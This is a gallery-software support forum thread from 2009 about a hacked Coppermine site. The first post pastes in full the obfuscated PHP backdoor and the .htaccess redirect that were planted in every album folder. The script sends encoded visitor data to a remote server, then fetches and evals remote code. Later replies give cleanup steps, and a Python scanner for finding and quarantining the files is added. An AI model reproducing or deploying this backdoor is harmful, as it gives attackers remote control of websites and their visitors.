Almost all Images/Thumbs not showing ( albums flooded with .htaccess)
 



Started by metal13, September 09, 2009, 05:20:23 PM


metal13


Not sure what did it, but every album directory has an htaccess file and a PHP file...
MY GALLERY :: 11565 files in 717 albums and 17 categories

There's no way I can delete them all... it's gonna take forever to do that...
Is there a way to batch delete them?
Or make a main htaccess to ignore the htaccess in the directories?


my site: http://minipoy.com/media/index.php
( Warning: Adult content )

Installed plug-ins
Quote
Name Onlinestats v1.8
Name JUpload plugin Plugin v3.5.1
Name Stats v1.1.1
Copy /Paste BB Code image url v1.2
Search Engine Friendly URLs v1.44 <<<< is it this one???




214106.php
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=
(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=
(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=
(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=
(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=
(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_en
code($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base
64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="a4bfca0f6acea34f6f84287dcf6e4e25") $f=$_REQUEST["id"];
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>




.htaccess
Options -MultiViews
ErrorDocument 404 //media/albums/Celebrities/A-B/AB Production/214106.php


Nibbler

You were probably hacked. See http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

If you want to learn how to use .htaccess files as you ask, read the Apache documentation.

metal13

I give up  :-\... tried my best  :-[... wasted 4 hours and all I got is a 500 server error on all pages every time...  :'( :'( :'( :'(

Can someone help me please... I need an htaccess that can ignore all ".htaccess" in my albums folder... or ignore all htaccess in my server...

Nibbler... help meeeeeeeeeeeeeee................... pleeeeaaassseeee......... :'( :'( :'( :'( :'( :'( :'(

onthepike

You were definitely hacked, and by the looks of it, based upon your htaccess file, hacked into your document root. Not good.

What version were you running at the time of this hack? I see that you are currently running 1.4.24.

I don't know of an automated way to delete all the htaccess files, but you should immediately delete the non-Coppermine (numbered) php files. Then delete each htaccess file within the albums folder. Then clean your web space entirely by eliminating files and folders that shouldn't be there and updating everything you're running.

I would begin by shutting down the gallery and placing it into maintenance mode. Make a backup of your include/config.inc.php file and your database (and any other custom file you may have). Then delete everything inside the media directory, except the albums folder. Then run through the albums folder and delete everything that's not an image.

Fire up your FTP client and get to work.
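The cleanup steps described above can be batched across all album folders. The following is an added example, not part of the original posts and not Coppermine code: it walks an albums directory (for instance a downloaded copy), reports numbered PHP files, .htaccess files whose ErrorDocument points at a PHP file, and anything that is not an image, and can move the first two kinds to a quarantine folder. The image extension list, the reason labels and the script name are assumptions; the quarantine folder must sit outside the albums tree and outside the web root.

```python
import os, re, shutil, sys

# Assumption: only these extensions are legitimate album content on this site.
IMAGE_EXT = {".jpg", ".jpeg", ".png", ".gif"}
NUMBERED_PHP = re.compile(r"^\d+\.php$")  # same shape as 214106.php in the post
# An ErrorDocument directive whose target is a .php file (path may contain spaces).
ERRDOC_TO_PHP = re.compile(r"^\s*ErrorDocument\s+\d{3}\s+\S.*\.php\s*$", re.I | re.M)

def classify(path):
    """Return a reason string if the file should be reviewed, else None."""
    name = os.path.basename(path)
    if NUMBERED_PHP.match(name):
        return "numbered-php"
    if name == ".htaccess":
        with open(path, errors="replace") as fh:
            hit = ERRDOC_TO_PHP.search(fh.read())
        return "htaccess-errordocument-php" if hit else "htaccess-other"
    if os.path.splitext(name)[1].lower() not in IMAGE_EXT:
        return "non-image"
    return None

def scan(albums_root):
    """Walk the albums tree and return sorted (relative_path, reason) pairs."""
    findings = []
    for dirpath, _dirs, files in os.walk(albums_root):
        for name in files:
            full = os.path.join(dirpath, name)
            reason = classify(full)
            if reason:
                findings.append((os.path.relpath(full, albums_root), reason))
    return sorted(findings)

def quarantine(albums_root, findings, dest, reasons):
    """Move findings with the given reasons to dest, keeping the folder layout."""
    moved = []
    for rel, reason in findings:
        if reason in reasons:
            target = os.path.join(dest, rel)
            os.makedirs(os.path.dirname(target), exist_ok=True)
            shutil.move(os.path.join(albums_root, rel), target)
            moved.append(rel)
    return moved

if __name__ == "__main__":
    # Usage: python scan_albums.py ALBUMS_DIR [QUARANTINE_DIR]  (list only if no dest)
    found = scan(sys.argv[1])
    for rel, reason in found:
        print(f"{reason}\t{rel}")
    if len(sys.argv) > 2:
        bad = {"numbered-php", "htaccess-errordocument-php"}
        print("moved:", len(quarantine(sys.argv[1], found, sys.argv[2], bad)))
```

Files reported as "non-image" or "htaccess-other" are only listed, since some of them may belong to the gallery; review them by hand before removing anything.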

metal13

It's all gone now... I downloaded all my albums, searched and removed them on my PC... then re-uploaded them again...  :'( :'( :'( hope it doesn't happen again...

onthepike

Quote from: metal13 on September 16, 2009, 04:54:53 AM
Hope it doesn't happen again.

Did you actually update your gallery, or simply clean out the "bad files" and re-upload?

Your version (1.4.24) is the same version it was when you posted. It should read 1.4.25 after update. Simply deleting the "bad files" isn't going to protect you. And what version of CPG were you running BEFORE you last updated, and when did you last update? And did you inspect the rest of your web space for "bad files" as well?

Did you perform all steps here: http://forum.coppermine-gallery.net/index.php/topic,51927.0.html

If you didn't, you'll be back here again.